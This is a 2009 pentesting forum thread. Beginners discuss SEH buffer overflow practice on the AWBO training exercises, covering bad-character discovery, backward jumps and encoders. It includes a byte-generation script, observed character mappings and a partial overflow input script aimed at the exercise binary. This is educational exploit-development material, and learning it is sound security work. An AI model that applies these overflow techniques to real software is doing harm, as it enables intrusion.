|
|||||||
| Pentesting Specific topics related to legal penetration testing |
 |
|
|
LinkBack | Thread Tools | Display Modes |
10-15-2009, 04:54 AM
|
|||
|
|||
AWBO Buffer Overflow Exercise
Hello,
I'm pretty new to developing exploits and I'm trying the awbo exercises, which can be found at snort.org/vrt/tools/awbo.html ... I've successfully triggered the vulnerability (on the first exercise), which is a SEH overflow... At my current level of knowledge I'm stuck on 3 points: 1 - The payload I need to jump to is before the SEH overflow 2 - The opcodes to a JUMP SHORT do not work (bad chars I believe...), another problem is that I need to jump over 128 bytes before, so a SHORT won't work 3 - Required opcodes to decode the payload seem to be blocked (x86/alpha_upper), I've also tested the x86/alpha_mixed... Is there any tool which generates a list of opcodes that I may insert as a payload and analise what are the bad chars? What about the other issues I've mentioned? Any help is appreciated! Thank you. 
|
|
10-15-2009, 03:42 PM
|
|||
|
|||
|
Hmmm, I'm pretty new to exploit development also. How about generating a string with the entire ascii set (omitting the null character of course). Send that in the buffer and check it out through the debugger. See what gets filtered and exclude those characters as bad. I guess you might need to run it through several times to get all the badchars.
That's the advice given in the shellcoder's handbook in any case, and it seemed to work for me. I'd also appreciate any recommendations on a better way. Oh, thanks for the tip on the awbo exercises as well; I hadn't seen those before so extra practice ahead! As for the tool to find opcodes: msfpescan maybe? I'm very new to jumps so haven't had much experience there sorry. Is there such a thing as a LONG jump though or can you use two SHORT jumps? Cheers Last edited by F1gureF0ur; 10-15-2009 at 03:45 PM.
|
|
10-15-2009, 07:41 PM
|
|||
|
|||
|
Thanks for the help F1gureF0ur!
I've made this script in order to generate the string and redirected its output to a file: Code:
import sys
sys.stdout.write("\"")
i = 1
while i < 255:
sys.stdout.write("\\x")
if i < 16:
sys.stdout.write("0")
sys.stdout.write(hex(i)[2:])
i += 1
print("\"")
Code:
\x61 -> \x85 \x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f -> \x3f \xa2 -> \x9b \xa3 -> \x9c \xa7 -> \x15 \xa9 -> \x22 \xaa -> \xa6 \xac -> \xaa \xb0 -> \xf8 \xb2 -> \xfd \xb3 -> \x33 \xb8 -> \x27 \xb9 -> \x31 \xba -> \xa7 \xbb -> \x3d \xbc -> \x2c \xbd -> \x2d \xbe -> \x2e \xbf -> \x3b \xc0 -> \x27 \xdc -> \x5d \xdd -> \x5b \xde -> \x7e \xe3\xe4 -> \x30 \xe2 -> \x5c \xe7 -> \x87 These are the ones that did not appear in the memory: Code:
\x07\x08\x0a\x0d\x13\x14\x1b\x25\x28\x29\x2b\x5e\x5f\x60\x7b\x7d\x7e\x7f\x81\x8d\x8f\x90\x9d\xa0\xa1\xa4\xa5\xa6\xa8\xab\xad\xae\xaf\xb1\xb4\xb5\xb6\xb7\xc3\xc4\xc5\xc6\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1 Thank you again.
|
|
10-16-2009, 08:19 AM
|
||||
|
||||
|
I used a modified version of the jump code from this page last time I did an SEH overwrite, to get to the earlier section of my buffer from the section of memory after the SEH address.
You'll probably be able to roll your own using the details at the link above, but if you like I can post the assembly and provide the method I used to convert it to shellcode (my rubbish assembly skills necessitated some nasty hacks, but it worked).
__________________
Nancy Astor: If I were your wife I would put poison in your coffee! Winston Churchill: Madam, if I were your husband I would drink it.
|
|
10-16-2009, 04:46 PM
|
|||
|
|||
|
That's a nice little article. Thanks lupin
 I also found a couple of the videos (webcasts) in the Offensive Security website resources section helpful with seh overflows. The apple QuickTime vid is good, as is the Surgemail overview. If anyone can point to any other good resources I'd be grateful!
|
|
10-16-2009, 04:59 PM
|
||||
|
||||
|
Quote:
Theres some more good stuff here, and here and the securityforest site that my previous link was from has some other good references.
__________________
Nancy Astor: If I were your wife I would put poison in your coffee! Winston Churchill: Madam, if I were your husband I would drink it.
|
|
10-17-2009, 03:06 AM
|
|||
|
|||
|
Thank you for the replies!
I've also found the offensive security's webcast very didactic, pretty good resource. Thank you lupin for the links provided, I'll study that and post the results of my tests as soon as possible. There's still the bad chars issue, but one step at a time. As soon as I can get EIP pointing to my buffer, I'll focus on that problem. =) (or... perhaps I should solve the bad chars issue before?)
|
|
10-17-2009, 05:45 AM
|
||||
|
||||
|
Quote:
__________________
Nancy Astor: If I were your wife I would put poison in your coffee! Winston Churchill: Madam, if I were your husband I would drink it.
|
|
10-17-2009, 05:39 PM
|
|||
|
|||
|
Thank you so much for that lupin. I've been struggling with my first SEH overwrite today and that series of blog articles looks like it will be the extra bit of 'hand-holding' i'll need.
Cheers!
|
|
10-19-2009, 06:55 PM
|
|||
|
|||
|
lupin, the jump backwards assembly code worked! I hardcoded it into immunity dbg though, since I think my string input method is a piece of...
This is the code I'm using to send the string: Code:
import win32com.client
shell = win32com.client.Dispatch("WScript.Shell")
shell.AppActivate('awbo2.exe')
shell.SendKeys(('A' * 1076) + "\x42\x42\x42\x42\x6b\x10\x40\x00")
shell.SendKeys('{ENTER}')
I think the bad chars problem is being originated from the method I'm currently using. Is there a better way to send the string to the program when it's opened with immdbg?
|
|
| Bookmarks |
«
Previous Thread
|
Next Thread
»
| Thread Tools | |
| Display Modes | |
Linear Mode
|
|
All times are GMT. The time now is 03:53 PM.
